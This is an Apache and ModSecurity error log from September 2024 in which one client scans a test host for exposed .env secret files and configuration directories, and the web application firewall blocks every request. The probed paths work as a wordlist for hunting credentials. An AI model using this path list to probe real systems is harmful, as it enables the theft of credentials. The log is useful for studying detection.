[Sat Sep 28 19:27:48.134657 2024] [:error] [pid 2261889] [client 45.135.232.70:55566] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/drupal/sites/default/files/.env"] [unique_id "Zvg8lFqeHCRD_JMeF92BOwAAAAA"]
[Sat Sep 28 19:27:48.134812 2024] [:error] [pid 2261889] [client 45.135.232.70:55566] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/drupal/sites/default/files/.env"] [unique_id "Zvg8lFqeHCRD_JMeF92BOwAAAAA"]
[Sat Sep 28 19:27:48.177021 2024] [authz_core:error] [pid 2249643] [client 45.135.232.70:55724] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/logs
[Sat Sep 28 19:27:48.199497 2024] [authz_core:error] [pid 2249653] [client 45.135.232.70:55496] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/circleci
[Sat Sep 28 19:27:48.219368 2024] [authz_core:error] [pid 2249675] [client 45.135.232.70:55448] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup
[Sat Sep 28 19:27:48.224402 2024] [authz_core:error] [pid 2249684] [client 45.135.232.70:55474] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup
[Sat Sep 28 19:27:48.233781 2024] [authz_core:error] [pid 2249668] [client 45.135.232.70:55556] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/configs
[Sat Sep 28 19:27:48.244071 2024] [authz_core:error] [pid 2261889] [client 45.135.232.70:55620] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/gitlab-ci
[Sat Sep 28 19:27:48.244464 2024] [authz_core:error] [pid 2249654] [client 45.135.232.70:55522] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/cloudformation
[Sat Sep 28 19:27:48.255244 2024] [:error] [pid 2249667] [client 45.135.232.70:55864] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /secure/credentials/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/secure/credentials/.env"] [unique_id "Zvg8lP23FuikRQCPfBtwUgAAAAo"]
[Sat Sep 28 19:27:48.255360 2024] [authz_core:error] [pid 2249660] [client 45.135.232.70:55708] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/logs
[Sat Sep 28 19:27:48.255865 2024] [:error] [pid 2249667] [client 45.135.232.70:55864] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/secure/credentials/.env"] [unique_id "Zvg8lP23FuikRQCPfBtwUgAAAAo"]
[Sat Sep 28 19:27:48.256307 2024] [:error] [pid 2249667] [client 45.135.232.70:55864] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/secure/credentials/.env"] [unique_id "Zvg8lP23FuikRQCPfBtwUgAAAAo"]
[Sat Sep 28 19:27:48.310983 2024] [:error] [pid 2249653] [client 45.135.232.70:55778] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /microservices/user/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/microservices/user/.env"] [unique_id "Zvg8lEaN42JCUVKnn4KGVQAAAAY"]
[Sat Sep 28 19:27:48.311239 2024] [:error] [pid 2249653] [client 45.135.232.70:55778] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/microservices/user/.env"] [unique_id "Zvg8lEaN42JCUVKnn4KGVQAAAAY"]
[Sat Sep 28 19:27:48.311502 2024] [:error] [pid 2249653] [client 45.135.232.70:55778] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/microservices/user/.env"] [unique_id "Zvg8lEaN42JCUVKnn4KGVQAAAAY"]
[Sat Sep 28 19:27:48.324218 2024] [:error] [pid 2249675] [client 45.135.232.70:55896] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /services/payment/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/services/payment/.env"] [unique_id "Zvg8lBj1bG4ic-iMijmOfAAAAAw"]
[Sat Sep 28 19:27:48.324569 2024] [:error] [pid 2249675] [client 45.135.232.70:55896] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/services/payment/.env"] [unique_id "Zvg8lBj1bG4ic-iMijmOfAAAAAw"]
[Sat Sep 28 19:27:48.324828 2024] [:error] [pid 2249675] [client 45.135.232.70:55896] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/services/payment/.env"] [unique_id "Zvg8lBj1bG4ic-iMijmOfAAAAAw"]
[Sat Sep 28 19:27:48.356909 2024] [:error] [pid 2261889] [client 45.135.232.70:55638] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /home/deploy/myapp/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/home/deploy/myapp/.env.production"] [unique_id "Zvg8lFqeHCRD_JMeF92BPQAAAAA"]
[Sat Sep 28 19:27:48.357155 2024] [:error] [pid 2261889] [client 45.135.232.70:55638] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/home/deploy/myapp/.env.production"] [unique_id "Zvg8lFqeHCRD_JMeF92BPQAAAAA"]
[Sat Sep 28 19:27:48.357380 2024] [:error] [pid 2261889] [client 45.135.232.70:55638] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/home/deploy/myapp/.env.production"] [unique_id "Zvg8lFqeHCRD_JMeF92BPQAAAAA"]
[Sat Sep 28 19:27:48.360899 2024] [:error] [pid 2249654] [client 45.135.232.70:55590] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /drupal/sites/default/files/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/drupal/sites/default/files/.env.local"] [unique_id "Zvg8lPuFShfxCpgLyHNC-AAAAAc"]
[Sat Sep 28 19:27:48.361108 2024] [:error] [pid 2249654] [client 45.135.232.70:55590] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/drupal/sites/default/files/.env.local"] [unique_id "Zvg8lPuFShfxCpgLyHNC-AAAAAc"]
[Sat Sep 28 19:27:48.361270 2024] [:error] [pid 2249654] [client 45.135.232.70:55590] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/drupal/sites/default/files/.env.local"] [unique_id "Zvg8lPuFShfxCpgLyHNC-AAAAAc"]
[Sat Sep 28 19:27:48.363479 2024] [authz_core:error] [pid 2249667] [client 45.135.232.70:55482] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/cloudformation
[Sat Sep 28 19:27:48.429560 2024] [authz_core:error] [pid 2249643] [client 45.135.232.70:55698] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/kubernetes
[Sat Sep 28 19:27:48.472962 2024] [:error] [pid 2261889] [client 45.135.232.70:55794] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /microservices/payment/config/.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/microservices/payment/config/.env.prod"] [unique_id "Zvg8lFqeHCRD_JMeF92BPgAAAAA"]
[Sat Sep 28 19:27:48.473230 2024] [:error] [pid 2261889] [client 45.135.232.70:55794] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/microservices/payment/config/.env.prod"] [unique_id "Zvg8lFqeHCRD_JMeF92BPgAAAAA"]
[Sat Sep 28 19:27:48.473401 2024] [:error] [pid 2261889] [client 45.135.232.70:55794] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/microservices/payment/config/.env.prod"] [unique_id "Zvg8lFqeHCRD_JMeF92BPgAAAAA"]
[Sat Sep 28 19:27:48.500264 2024] [:error] [pid 2249660] [client 45.135.232.70:55910] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /srv/myapp/.env.staging.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/srv/myapp/.env.staging.local"] [unique_id "Zvg8lJBQfEe6xIb_MNUkSgAAAAg"]
[Sat Sep 28 19:27:48.500479 2024] [:error] [pid 2249660] [client 45.135.232.70:55910] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/srv/myapp/.env.staging.local"] [unique_id "Zvg8lJBQfEe6xIb_MNUkSgAAAAg"]
[Sat Sep 28 19:27:48.500641 2024] [:error] [pid 2249660] [client 45.135.232.70:55910] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/srv/myapp/.env.staging.local"] [unique_id "Zvg8lJBQfEe6xIb_MNUkSgAAAAg"]
[Sat Sep 28 19:27:48.502378 2024] [:error] [pid 2249668] [client 45.135.232.70:55772] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /microservices/payment/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/microservices/payment/.env.production"] [unique_id "Zvg8lKBqJNrqFhpfIKQITgAAAAs"]
[Sat Sep 28 19:27:48.502588 2024] [:error] [pid 2249668] [client 45.135.232.70:55772] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/microservices/payment/.env.production"] [unique_id "Zvg8lKBqJNrqFhpfIKQITgAAAAs"]
[Sat Sep 28 19:27:48.502743 2024] [:error] [pid 2249668] [client 45.135.232.70:55772] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/microservices/payment/.env.production"] [unique_id "Zvg8lKBqJNrqFhpfIKQITgAAAAs"]
[Sat Sep 28 19:27:48.512841 2024] [authz_core:error] [pid 2249650] [client 45.135.232.70:55802] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/opt
[Sat Sep 28 19:27:48.571435 2024] [authz_core:error] [pid 2249675] [client 45.135.232.70:55980] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/tmp
[Sat Sep 28 19:27:48.573672 2024] [authz_core:error] [pid 2249653] [client 45.135.232.70:56032] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Sat Sep 28 19:27:48.579706 2024] [authz_core:error] [pid 2261889] [client 45.135.232.70:56042] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Sat Sep 28 19:27:48.601801 2024] [:error] [pid 2249660] [client 45.135.232.70:56004] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /usr/share/myapp/config/.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/usr/share/myapp/config/.env.development"] [unique_id "Zvg8lJBQfEe6xIb_MNUkSwAAAAg"]
[Sat Sep 28 19:27:48.602098 2024] [:error] [pid 2249660] [client 45.135.232.70:56004] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/usr/share/myapp/config/.env.development"] [unique_id "Zvg8lJBQfEe6xIb_MNUkSwAAAAg"]
[Sat Sep 28 19:27:48.602354 2024] [:error] [pid 2249660] [client 45.135.232.70:56004] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/usr/share/myapp/config/.env.development"] [unique_id "Zvg8lJBQfEe6xIb_MNUkSwAAAAg"]
[Sat Sep 28 19:27:48.613501 2024] [authz_core:error] [pid 2249668] [client 45.135.232.70:55962] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/tmp
[Sat Sep 28 19:27:48.622291 2024] [authz_core:error] [pid 2249654] [client 45.135.232.70:55880] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/services
[Sat Sep 28 19:27:48.638691 2024] [authz_core:error] [pid 2264106] [client 45.135.232.70:55970] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/tmp
[Sat Sep 28 19:27:48.639653 2024] [authz_core:error] [pid 2249684] [client 45.135.232.70:55870] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/secure
[Sat Sep 28 19:27:48.681196 2024] [:error] [pid 2249653] [client 45.135.232.70:55922] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /srv/www/myproject/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/srv/www/myproject/.env"] [unique_id "Zvg8lEaN42JCUVKnn4KGWAAAAAY"]
[Sat Sep 28 19:27:48.681552 2024] [:error] [pid 2249653] [client 45.135.232.70:55922] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/srv/www/myproject/.env"] [unique_id "Zvg8lEaN42JCUVKnn4KGWAAAAAY"]
[Sat Sep 28 19:27:48.681769 2024] [:error] [pid 2249653] [client 45.135.232.70:55922] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/srv/www/myproject/.env"] [unique_id "Zvg8lEaN42JCUVKnn4KGWAAAAAY"]
[Sat Sep 28 19:27:48.688030 2024] [authz_core:error] [pid 2261889] [client 45.135.232.70:55852] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/secure
[Sat Sep 28 19:27:48.710724 2024] [authz_core:error] [pid 2249660] [client 45.135.232.70:56034] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Sat Sep 28 19:27:48.727280 2024] [authz_core:error] [pid 2249668] [client 45.135.232.70:55884] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/services
[Sat Sep 28 19:27:48.760772 2024] [:error] [pid 2249684] [client 45.135.232.70:55984] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /usr/local/myapp/.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/usr/local/myapp/.env.prod"] [unique_id "Zvg8lBALs-4cd1tEVbRZMwAAAA4"]
[Sat Sep 28 19:27:48.761388 2024] [:error] [pid 2249684] [client 45.135.232.70:55984] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/usr/local/myapp/.env.prod"] [unique_id "Zvg8lBALs-4cd1tEVbRZMwAAAA4"]
[Sat Sep 28 19:27:48.761859 2024] [:error] [pid 2249684] [client 45.135.232.70:55984] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/usr/local/myapp/.env.prod"] [unique_id "Zvg8lBALs-4cd1tEVbRZMwAAAA4"]
[Sat Sep 28 19:27:48.776798 2024] [authz_core:error] [pid 2249667] [client 45.135.232.70:56028] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
